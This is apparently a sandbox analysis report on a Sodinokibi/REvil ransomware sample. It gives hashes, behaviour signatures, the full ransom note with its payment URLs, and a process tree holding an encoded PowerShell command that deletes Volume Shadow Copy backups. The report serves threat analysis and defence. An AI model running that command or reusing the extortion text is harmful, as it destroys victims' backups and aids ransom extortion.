Overview

overview

10

Static

static

10

0c3b09213f...3c.exe

windows7-x64

8

0dab0428b4...50.exe

windows7-x64

10

14d09a259f...32.exe

windows7-x64

10

16c49d6775...56.exe

windows7-x64

7

1d241bd0b7...f4.exe

windows7-x64

9

2.exe

windows7-x64

6

287a6b75d1...ad.exe

windows7-x64

10

35b0676421...82.exe

windows7-x64

10

39deb2f02f...9f.exe

windows7-x64

8

4.exe

windows7-x64

7

4a0f399840...33.exe

windows7-x64

10

5.exe

windows7-x64

8

53bdaf567e...fc.exe

windows7-x64

7

6.exe

windows7-x64

5

646677375b...36.exe

windows7-x64

9

6dfb9490b1...f8.exe

windows7-x64

6

7.exe

windows7-x64

10

71a20e2700...db.exe

windows7-x64

3

835b0ef8f5...35.exe

windows7-x64

7

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...gs.dll

windows7-x64

3

b15b78937c...ac.exe

windows7-x64

7

$PLUGINSDIR/INetC.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...gs.dll

windows7-x64

3

b3dc1bb1c7...1b.exe

windows7-x64

5

b4e3091d31...81.exe

windows7-x64

10

c1b35d3d70...c3.exe

windows7-x64

10

caa5f52a78...78.exe

windows7-x64

10

d2878de61f...0b.exe

windows7-x64

7

dbadeff4af...30.exe

windows7-x64

10

f5d893afc4...e9.exe

windows7-x64

9

Analysis

  • max time kernel
    12s
  • max time network
    14s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 13:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b4e3091d3119268dfc8ac3caf2d5d02fd4faa360f822a87b50110b805e465181.exe

  • Size

    164KB

  • MD5

    921b05d4fdd12c986bed19ae96d10fc4

  • SHA1

    b6cdb9f5693da24b95fb479b191504f7e22cf717

  • SHA256

    b4e3091d3119268dfc8ac3caf2d5d02fd4faa360f822a87b50110b805e465181

  • SHA512

    72f5dc8c1c205cba6bf89bc274beb57e31723736a9040c4231a12b8c2ff0095cf35201e993ee88b636165da465d5516dfeae50b1d332ba15c8a739a479c0ff21

  • SSDEEP

    3072:FHixaVZFiOCDJtOicNDWEzZz61d7canxB:FHigLF5CCj5zZ41

Score
10/10
sodinokibidiscoveryransomware

Malware Config

Extracted

Path

C:\Users\11xy9-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 11xy9. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/120D228E2FAC83AE 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/120D228E2FAC83AE Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 6+9RDy0E7vweAW0axGvieRQq2Hl5FsjM+gVZljQX50vThrQE2vbGDIkoaxUXFAz4 G8QqvgO8NbsDDbRq4kXotVONwcXI2YLIfXqHFtvx7caIopcxwlljmNYLXBzv9kx5 hV8xqRHITEoeeaEyOq0LcXCNv09SqB1oRXbi1JauUXvsoxoVptdCWB/UsLhWI846 fwhiQ7Z71gXHF7M71mjEwJTXIdicq5HcnIvanyBnSuHSDtJgHp2cXAKSrDesOD0t dUIpov32v5wpV4WGHTGtkWwj0lPjOdYNCbF7+h3LotsGnjtRp1N45bKLzktiRgId F2y7ojzySvm6aDCAM9nFSUGLZpVc+fBan06cv9X/jhGCAB3yXCUculdZqRyxbdN6 47b04IMGO6b0tHcoZYGYnrKq0X5Ia8RwPi+WHQuT+V5QajZrj9aycT0j9pya2Eb0 4zpxeO6/7/xHGS5gRLs/J5Nw7654MITAh80HGWg3bHyfskP/LU9lDfWwJ5XK9vLM 4dAqTTrIQV8RrvZs4g1gIo3zeq/jxuCv8GEXsU63VvTE9GXYdBi6baup+vN4QZcL NZ2AQYRAGS34aRB3s3C1P8h0N4/Hi7O7NovqlEn+XSKOP2BNSdMORu2tkMtksC87 r21HzNvH1xwONLaOdDqjMU9wrw6Dq+oD6j7Fm0RNr8BY513KBuYL3DpIMYaepQCt 9ez7tCOBCT8F2rcz5NZ+TaLEzFeHaOQ5uwkoaIdEl89RDw3rbklkOfl8sSBFGjBy skPBJernUj9ZVPD8FPW73DUSJaxmxYo1bS7a6LawRn2i1veqn2FioRds4TtAXvpp IZVw0a4h9+2f2oSGs5aD9zNwwe+yLSgcv3zERqaKKHXKaHosFcqfaUnD8rsruRt9 /1GDQMbU+7R0bVFVh2lJ9bUJtCQILpLWKhrKjus+lmbGBvsSDD4ELWEVMdlr18Em EXMM3rsJ8Wm6wp5hmMXfn9CzRZhkm8VPg1krGvOoT7yEEV/fExxFx+Uyl7ACjU/b 59IyF6miNxIdJo+v3sMFEhKd+la1CU0CfUxEe9zH5hIi0ArTeC3yEfeFM0Rooffz y8nd6og06TRelR4DNV1oGbkOTQ4JThwwdQtEdbMgtz++H16ZEfVfi1EbI/NLODDu R3+YPrb8z/tmdb6BXTABSofiWA8BerKI0WnZv5e2KBHCE3H0eeTj2rYEAnwoTf+2 mD7DwOjw Extension name: 11xy9 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/120D228E2FAC83AE

http://decryptor.top/120D228E2FAC83AE

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Sodinokibi family
    sodinokibi
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 13 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4e3091d3119268dfc8ac3caf2d5d02fd4faa360f822a87b50110b805e465181.exe
    "C:\Users\Admin\AppData\Local\Temp\b4e3091d3119268dfc8ac3caf2d5d02fd4faa360f822a87b50110b805e465181.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2020
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2332
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2776

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\11xy9-readme.txt
      Filesize

      6KB

      MD5

      36498cb8adc2e7e5a80feb358d9811cd

      SHA1

      64ff42e2188a9dc482dc9051681f493668a05b5f

      SHA256

      3efa613f3d29c1c16188b5cac4d19cb60f6e0e276ae75181b64fbad97b2c1fb6

      SHA512

      bf75fa88d14e9bef856a891b803f99d5dfdf43723505d1949ec89f0976b8c0361eb3ba1fc2bd864a4f4f1e0c17c93389c304321821268fe984d6a3fa46db85be

      Download Submit

    • memory/2020-4-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2020-5-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2020-6-0x0000000002290000-0x0000000002298000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2020-7-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2020-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2020-9-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2020-10-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2020-11-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2020-12-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

      Download